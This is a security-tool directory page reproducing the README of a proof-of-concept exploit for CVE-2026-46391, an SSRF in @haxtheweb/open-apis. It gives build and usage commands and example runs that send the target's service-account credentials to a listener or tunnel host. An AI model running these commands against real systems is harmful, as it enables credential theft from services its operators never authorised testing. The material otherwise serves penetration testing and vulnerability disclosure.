Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2026-46391 — Proof of concept exploit for CVE-2026-46391 | Kitploit
Tools/GitHubGitHub/bradyjmcl/cve-2026-46391
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

Proof of concept exploit for CVE-2026-46391

View Repository
122 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-46391 - Credential Exposure via SSRF in @haxtheweb/open-apis

test

Proof of concept for CVE-2026-46391. Triggers the SSRF vulnerability in the cacheAddress endpoint of @haxtheweb/open-apis and captures the service account credentials sent in the callback.

Build

root@kitploit:~
go build -o cve-2026-46391 .

Test

root@kitploit:~
go test ./...

Usage

root@kitploit:~
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]
Download Tool

Options

FlagDescriptionDefault
-u, --urlTarget web root (e.g. http://10.10.0.80:3000)required
-l, --listenerYour IP/hostname or tunnel URL (e.g. 192.168.1.10, https://uuid.trycloudflare.com)required
-p, --portLocal port to listen on8080
-t, --timeoutSeconds to wait for callback30
-v, --verbosePrint headers and body of every inbound requestoff

Examples

Direct (same network as target):

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

Via VPS/Cloudflare tunnel/etc:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

Custom port and timeout:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60